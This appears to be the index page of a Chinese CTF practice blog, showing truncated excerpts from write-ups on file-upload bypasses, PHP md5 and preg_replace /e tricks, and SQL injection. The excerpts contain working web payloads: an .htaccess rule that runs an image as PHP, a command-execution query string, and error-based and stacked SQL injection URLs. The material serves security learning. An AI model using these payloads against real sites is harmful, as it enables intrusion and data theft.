4.14文件上传刷题日记
buuctf[是兄弟就来传马先传一个php木马
页面报错,随便改一个后缀,看看是黑名单还是白名单过滤,这里php代码前加GIF89a绕过图片大小检查
报错,接着试一下是不是MIME过滤
Content-Type: image/png
上传成功 /var/www/html/upload/743be915f2c6ab5de3600d87068cafd2/hack.jpg succesfully uploaded!
接下来修改.htaccess解析文件,记得改Content-type
123<FilesMatch "hack" >SetHandler application/x-httpd-php</FilesMatch>
/var/www/html/upload/743be915f2c6ab5de3600d87068cafd2/.htaccess succesfully uploaded!
接着上传hack.jpg图片/var/www/html/upload/743be915f2 ...
[XYCTF]刷题笔记
[Solved]Warm up第一个是经典的0e绕过,?val1=QNKCDZO&val2=240610708
$$md5 == md5$$md5)用特殊字符串&md5=0e215962017
第三个利用$XYCTF可以被复写,保证xyctf和xy相同即可,md5编码XYCTF_550102591发现是0e打头,用0e绕过即可,&XYCTF=240610708&XY=240610708
接下来访问LLeeevvveeelll222.php
第一个if用到了interval,post,利用数组绕过a[]=a
echo preg_replace($_GET['a'],$_GET['b'],$_GET['c']);查阅资料得知a处正则用/e方式读取可以执行命令,payload:?a=/re/e&b=print_r(scandir('.'))&c=re读取到flag在根目录,&b ...
upload-labs刷题笔记
upload-labs刷题笔记1源代码:
1234567891011121314151617function checkFile() { var file = document.getElementsByName('upload_file')[0].value; if (file == null || file == "") { alert("请选择要上传的文件!"); return false; } //定义允许上传的文件类型 var allow_ext = ".jpg|.png|.gif"; //提取上传文件的类型 var ext_name = file.substring(file.lastIndexOf(".")); //判断上传文件类型是否允许上传 if (allow_ext.indexOf(ext_name + "|") == -1) { ...
文件上传漏洞学习笔记
文件上传漏洞参考文章:https://blog.csdn.net/qq_43390703/article/details/104858705
什么是文件上传漏洞?攻击者上传可执行的动态脚本文件,可以是木马,病毒,恶意脚本或者WebShell等。
什么是webshell?WebShell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称之为一种网页后门。攻击者在入侵了一个网站后,通常会将这些asp或php后门文件与网站服务器web目录下正常的网页文件混在一起,然后使用浏览器来访问这些后门,得到一个命令执行环境,以达到控制网站服务器的目的(可以上传下载或者修改文件,操作数据库,执行任意命令等)。 WebShell后门隐蔽较性高,可以轻松穿越防火墙,访问WebShell时不会留下系统日志,只会在网站的web日志中留下一些数据提交记录。
产生原因
对上传文件的后缀名没有做较为严格的限制
对上传文件的MIMETYPE没有做检查
权限上没有对于上传的文件目录设置不可执行权限
对于web server对于上传文件或者指定目录的行为没有做限制
原理WEB中上传文 ...
20240331刷题日记-sql
20240331刷题日记sql_sample复现找不到注入点,什么都被过滤,想起来有个robots.txt文件,发现hint
1234Only u input the correct password then u can get the flagand wxccc yyds.select * from users where username='$_POST["username"]' and password='$_POST["password"]';
密码必须输入wxccc?username单引号闭合
没思路,去看wp了
根据sql语句,可以加入\使引号改变闭合
payload可以是password=or 1 #&username=admin\
可以看到回显改变了,由于没学python,copy了一下脚本,用的应该是bool盲注
12345678910111213141516171819202122232425262728293031import requestsim ...
20240330刷题日记
2024/3/30 主站刷题1.ez_sql1.测试注入类型 回显 2-1不等于1,字符型
2.判断闭合方式
1‘看报错,得知单引号闭合
3.查列数
group by得2列
4.union select查询
select被过滤,绕过方法也失效,采用报错注入
http://210.30.97.133:28043/?inject=1'||extractvalue(1,concat('$',(database())))||'1'='1
1error 1105 : Unknown XPATH variable at: '$supersqli'
拿表名
发现过滤了==.==号,还过滤了where,查资料发现可以堆叠注入
http://210.30.97.133:28043/?inject=1';show databases;#
1234567891011121314151617181920212223242526272829array(1) { ...
DUTCTF2024 wp
PRTS-8- DUTCTF2024wpweb-数据库初学者先试了试bp和hackbar发现post过去都是404,直接输入框注入
判断闭合方式输入1’
得知闭合方式是单引号
判断列数1’ group by 4,2,3… 确认列数为3
union注入union select 1,2,3无回显,能报错,尝试extractvalue报错注入
数据库名1’ union select 1,extractvalue(1,concat(0x7e,(select database()))),3#
1’ union select 1,extractvalue(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata))),3#
表名1’ union select 1,extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema= ...
第一篇文章
博客的搭建1.node.js和git的安装2.hexo框架的安装